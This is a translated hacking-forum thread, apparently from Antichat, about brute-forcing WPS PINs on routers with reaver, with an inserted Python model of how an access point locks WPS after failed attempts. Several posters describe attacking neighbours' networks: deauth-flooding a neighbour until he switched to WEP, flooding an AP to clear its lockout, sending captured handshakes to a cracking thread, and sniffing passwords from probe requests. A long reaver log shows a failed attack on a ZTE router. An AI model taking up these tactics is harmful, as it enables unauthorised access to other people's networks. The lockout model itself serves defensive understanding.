Vulnerability in the Wi-Fi Protected Setup protocol

Discussion in 'Wireless technologies/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Felis-Sapiens, Reservists Of Antichat

  2. atlas28, Active Member

    A couple of words about what I wrote above, or rather about the results :) Since the situation was hopeless, a prolonged DDoS of my neighbour with deauth packets forced him to switch his security to WEP :) So now I have both access and the PIN written down.

  3. Goldstein, New Member

    The AP is a TL-WR720N. I was brute-forcing WPS with reaver. After roughly ~500 attempts strange things started happening.... After "Sending M2 message" a timeout appeared. Has the AP hung, or is this some kind of protection??? Will a reboot help?

  4. fire-dance, Elder - Старейшина

    Most likely the signal got weak and an error threw it off. Save the session; at night the signal and reaver are usually better.

  5. Goldstein, New Member

    Saved the session. All in all, it was a glitch in the AP. I had to flood it, and after the restart the process went on :)

  6. Alvinng, Member

    I have a router with BSSID: SAGEMCOM_XXXX. WPS locks after 10 attempts, and it unlocks only after a reboot. Can I set a delay in reaver after 9 attempts? And how long should it be?

  7. Mednik, Member

    Try the command in post No. 3299; it may go through.

  8. Alvinng, Member

    WARNING: Detected AP rate limiting, waiting 7205 seconds before re-checking
    i7 3630QM, 8 Gb RAM, Nvidia GT650M
     
    #3308 Alvinng, 25 Mar 2016
    Last edited: 25 Mar 2016
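Posts 6 and 8 above show the AP-side defence against WPS PIN guessing from the attacker's seat: the router sets its "AP Setup Locked" state after ten failed exchanges and stays locked until a reboot, and reaver backs off when it detects that state. The block below is an added example (not code from this thread or from any router firmware) that models that lockout from the defender's side, so the effect of the two policy choices can be compared: counting failures per AP rather than per station, and holding the lock until an administrative reset rather than for a fixed time. The event names, the failure threshold, the MAC addresses and the timings are constructed for the example.

```python
"""WPS PIN lockout model for an access point ('AP Setup Locked').

Constructed example, not code from the thread or from any router firmware.
The thresholds, event names and the station/event lists are assumptions.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Outcomes of one external-registrar PIN exchange, as the AP's WPS state
# machine sees them (names are constructed for this example).
FAIL_FIRST_HALF = "NACK_AFTER_M4"    # first PIN half did not verify
FAIL_SECOND_HALF = "NACK_AFTER_M6"   # second PIN half did not verify
SUCCESS = "M8_DONE"                  # full PIN verified, credentials delivered


@dataclass
class LockoutPolicy:
    max_failures: int = 10               # failures before the AP locks WPS
    lock_seconds: Optional[int] = None   # None: locked until admin reset/reboot
    per_ap: bool = True                  # one counter shared by all stations


@dataclass
class ApState:
    failures: Dict[str, int] = field(default_factory=dict)   # key -> count
    locks: Dict[str, float] = field(default_factory=dict)    # key -> lock time


def _key(policy: LockoutPolicy, sta: str) -> str:
    # A per-AP policy keys everything on "*"; a per-station policy on the MAC.
    return "*" if policy.per_ap else sta


def is_locked(state: ApState, policy: LockoutPolicy, now: float, sta: str) -> bool:
    """True if WPS PIN exchanges are currently refused for this requester."""
    key = _key(policy, sta)
    locked_at = state.locks.get(key)
    if locked_at is None:
        return False
    if policy.lock_seconds is not None and now - locked_at >= policy.lock_seconds:
        # Timed lockout expired: clear the lock and restart the counter.
        del state.locks[key]
        state.failures[key] = 0
        return False
    return True


def handle_attempt(state: ApState, policy: LockoutPolicy, now: float,
                   sta: str, outcome: str) -> str:
    """Process one PIN exchange.

    Returns 'rejected' if the AP refuses to run the exchange (locked),
    'failed' if it ran and the PIN was wrong, 'ok' on a successful enrolment.
    """
    key = _key(policy, sta)
    if is_locked(state, policy, now, sta):
        return "rejected"
    if outcome == SUCCESS:
        state.failures[key] = 0
        return "ok"
    state.failures[key] = state.failures.get(key, 0) + 1
    if state.failures[key] >= policy.max_failures:
        state.locks[key] = now
    return "failed"


def run(events: List[Tuple[float, str, str]], policy: LockoutPolicy):
    """Replay (time, station MAC, outcome) events; return decisions and state."""
    state = ApState()
    decisions = [handle_attempt(state, policy, t, sta, o) for t, sta, o in events]
    return decisions, state


# Constructed trace: one station fails 11 times in a row, then a second
# station tries once. MACs and timings are made up for the example.
EVENTS = [(2.0 * i, "00:11:22:aa:aa:aa", FAIL_FIRST_HALF) for i in range(11)]
EVENTS.append((24.0, "00:11:22:bb:bb:bb", FAIL_SECOND_HALF))


if __name__ == "__main__":
    for name, policy in [
        ("per-AP, until reboot", LockoutPolicy()),
        ("per-station, until reboot", LockoutPolicy(per_ap=False)),
        ("per-AP, 1 hour", LockoutPolicy(lock_seconds=3600)),
    ]:
        decisions, _ = run(EVENTS, policy)
        print(f"{name:28s} {' '.join(d[:3] for d in decisions)}")
```

With the default policy the eleventh exchange and the second station's exchange are both refused, which is the behaviour the Sagemcom in post 6 shows. With `per_ap=False` the second station is served normally, so a per-station counter protects nothing an attacker cannot reset by changing source address. A timed lock (the third run) eventually lets the exchange proceed again, which is why a tool can wait out the lock; a lock that only an administrator clears, or simply disabling WPS, has no such window.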
  9. V777, Elder - Старейшина

    Drop your handshake here https://forum.antichat.ru/threads/417617/ or here https://forum.antichat.ru/threads/435763/ ... And don't forget to say thanks )))

  10. Alvinng, Member

  11. startless, Member

    Rostelecom has started installing ZTE ZXHN H118N routers with BSSID D4:76:EA... WPS is enabled, but when you try to brute-force it, it accepts the first half of the code whatever it is, and then rejects every attempt to guess the second half. It doesn't work even if you brute-force sequentially without regard to the checksum digit. The Pixie attack doesn't work. The AP is very close, the signal is excellent, the adapter is a TP-Link TL-WN7200ND, proven many times in the field, OS Kali 2.0. Does anyone have any thoughts? Has anyone run into this?

  12. Triton_Mgn, Elder - Старейшина

    First you need to capture a couple of handshakes from such routers and post them in the password-cracking thread. If they can be cracked, I think they'll turn out to have identical passwords as always; Rostelecom has long been known for that. Then there'll be something to work from.

  13. TOX1C, Elder - Старейшина

    Or passwords generated by a known algorithm, as it was with the дурдом.ру routers :) zte is leaky as all hell.

  14. startless, Member

    Looks like they've released a new revision; this MAC address range shows up neither in Google nor in Shodan. Catching a handshake is problematic for now: in 4 days of the router running, not a single connection. I get the feeling they simply don't know how to pair their smartphones with it...

  15. startless, Member

    Here is a fragment of the brute-force. Odd that there are 45 repeats...

    [+] p2_index set to 503
    [+] Pin count advanced: 10503. Max pin attempts: 11000
    [+] 95.48% complete. Elapsed time: 0d1h29m42s.
    [+] Estimated Remaining time: 0d1h14m33s
    [+] Trying pin 13414979.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 6a:4c:3d:a7:7f:dc:82:cd:26:48:1a:40:33:2e:f7:e3
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: ZTE Corporation
    [P] WPS Model Name: ZXHN H118N
    [P] WPS Model Number: ZXHN H118N
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c2:10:53:c9:9c:6d:35:60:0b:7d:21:e6:a5:0a:2b:41
    [P] PKR: e6:a7:01:87:ad:02:1c:39:76:8d:93:24:fe:75:56:ae:60:b9:4a:40:61:84:a2:ec:58:97:25:41:9b:45:37:94:bf:92:55:bf:68:19:ab:db:8a:ff:4f:51:7d:84:a6:e6:62:b8:7d:6e:9d:85:84:d5:35:59:5a:88:42:7f:85:af:7f:93:f4:b3:4b:63:53:66:57:83:b4:0d:97:38:8e:c0:c4:04:c5:c5:ea:4a:d5:81:93:f9:62:e2:ab:58:9f:7b:47:3f:df:32:a7:db:cc:d1:6e:f4:47:84:3b:55:b6:88:9f:39:17:34:b0:b0:e2:88:7d:0f:b9:a6:a4:c3:25:5c:73:98:c4:44:0f:80:fd:43:38:04:89:3c:e1:d0:22:b8:9f:52:05:c6:c9:b7:27:71:58:45:d9:3b:ea:37:58:66:60:0f:0b:48:09:64:6b:78:50:2d:91:10:0d:71:a0:ae:80:90:79:d0:4f:e9:b7:30:8c:1b:cc:de:a8:f3:47:c1
    [P] AuthKey: 0b:41:30:67:63:e8:73:b9:2f:16:bd:fb:ad:bd:ac:37:f7:5f:7b:00:53:7a:92:81:27:59:15:13:ca:df:54:56
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [P] E-Hash1: f1:3c:1c:00:dc:08:cc:91:3e:e9:e5:14:e4:28:ea:11:94:5b:07:80:96:12:2e:74:47:0e:31:65:b6:42:39:6c
    [P] E-Hash2: f1:3c:1c:00:dc:08:cc:91:3e:e9:e5:14:e4:28:ea:11:94:5b:07:80:96:12:2e:74:47:0e:31:65:b6:42:39:6c
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK

    Rostelecom here has taken to setting 12-digit numeric passwords. On my old rig it would take me a month to brute-force that.
     
    #3315 startless, 11 Apr 2016
    Last edited: 11 Apr 2016
  16. TOX1C, Elder - Старейшина

    It doesn't accept the first half of the code; it terminates the eapol session incorrectly, and reaver thinks the first half went through. And it can't find the second half, because the first one is wrong too.

  17. startless, Member

    So what do you advise? How do I get into it? I think I've already tried every kind of key. Maybe play with delays? Bully doesn't crack it at all; it loops the same PIN endlessly...

  18. Triton_Mgn, Elder - Старейшина

    As I said, post the handshake in the free password-cracking thread.

  19. startless, Member

    A control pass over already-cracked APs confirms that the adapter works as it should. Other details came to light: Airodump detected WPS version 1.0 PBC, that is, WPS started by push-button. Could that be why the reaver attack fails?

  20. startless, Member

    While running airodump for a long time, I noticed by chance that every now and then the coveted password slips through in the "Probe" field! It seems someone enters it as the name of their device. I've already come across three of those... So you simply start airodump and listen to the air. Then you carefully study the client/AP associations and try the password: it usually stands out against plain AP and device names.
